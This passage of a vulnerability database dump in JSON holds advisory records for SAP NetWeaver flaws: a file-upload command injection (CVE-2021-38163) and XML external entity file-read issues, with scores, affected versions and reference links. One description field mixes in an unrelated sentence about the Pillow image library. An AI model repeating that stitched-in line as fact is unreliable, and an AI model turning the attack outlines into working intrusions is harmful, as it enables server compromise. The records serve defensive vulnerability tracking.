"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-38163",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-38163",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-38163",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "cna@sap.com",
"id": "CVE-2021-38163",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-800",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-38163",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver (Visual Composer 7.0 RT) versions - 7.30, 7.31, 7.40, 7.50, without restriction, an attacker authenticated as a non-administrative user can upload a malicious file over a network and trigger its processing, which is capable of running operating system commands with the privilege of the Java Server process. These commands can be used to read or modify any information on the server or shut the server down making it unavailable. SAP NetWeaver for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-38163"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38163",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091412",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38163",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"id": "VAR-202109-1053",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-01-17T18:28:35.917000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "top page",
"trust": 0.8,
"url": "https://www.sap.com/japan/index.html"
},
{
"title": "SAP Netweaver Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164657"
},
{
"title": "CVE-2021-38163",
"trust": 0.1,
"url": "https://github.com/core1impact/cve-2021-38163 "
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/06/15/microsoft_patch_tuesday/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=585106405"
},
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/3084487"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38163"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091412"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-of-september-2021-36390"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://github.com/core1impact/cve-2021-38163"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-14T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"date": "2022-08-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"date": "2021-09-14T12:15:10.890000",
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38163"
},
{
"date": "2022-08-16T05:02:00",
"db": "JVNDB",
"id": "JVNDB-2021-011902"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2022-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-800"
},
{
"date": "2023-08-08T14:21:49.707000",
"db": "NVD",
"id": "CVE-2021-38163"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-800"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0NetWeaver\u00a0 In \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-011902"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
var-201310-0619
Vulnerability from variot
The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue. SAP NetWeaver is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. Given the nature of this issue, attacker may also be able to cause a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201310-0619",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "lte",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "4.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.31",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6244"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Arseny Reutov of Positive Technologies.",
"sources": [
{
"db": "BID",
"id": "63302"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6244",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6244",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6244",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201310-551",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP) in SAP NetWeaver 7.31 and earlier allows remote attackers to read arbitrary files and directories via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue. SAP NetWeaver is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. Given the nature of this issue, attacker may also be able to cause a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "BID",
"id": "63302"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6244",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "55302",
"trust": 1.6
},
{
"db": "BID",
"id": "63302",
"trust": 1.3
},
{
"db": "OSVDB",
"id": "98892",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004874",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "63302"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"id": "VAR-201310-0619",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:44.540000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6244"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://en.securitylab.ru/lab/pt-2013-13"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/55302"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1820894"
},
{
"trust": 1.0,
"url": "http://osvdb.org/98892"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/63302"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6244"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6244"
},
{
"trust": 0.3,
"url": "https://www.sdn.sap.com/irj/sdn/webdynpro"
}
],
"sources": [
{
"db": "BID",
"id": "63302"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "63302"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-10-23T00:00:00",
"db": "BID",
"id": "63302"
},
{
"date": "2013-10-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"date": "2013-10-24T00:55:02.570000",
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"date": "2013-10-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-31T00:19:00",
"db": "BID",
"id": "63302"
},
{
"date": "2013-10-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004874"
},
{
"date": "2013-10-31T03:36:03.267000",
"db": "NVD",
"id": "CVE-2013-6244"
},
{
"date": "2013-10-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Live Update webdynpro Vulnerability in application to read arbitrary files and directories",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004874"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-551"
}
],
"trust": 0.6
}
}
var-201704-1646
Vulnerability from variot
SAP Composite Application Framework Authorization Tool is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201704-1646",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "97576"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "97576"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Composite Application Framework Authorization Tool is prone to an XML External Entity injection vulnerability.\nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "97576"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "97576",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "97576"
}
]
},
"id": "VAR-201704-1646",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:07:06.179000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2372301"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/11/14/sap-security-patch-day-november-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "97576"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
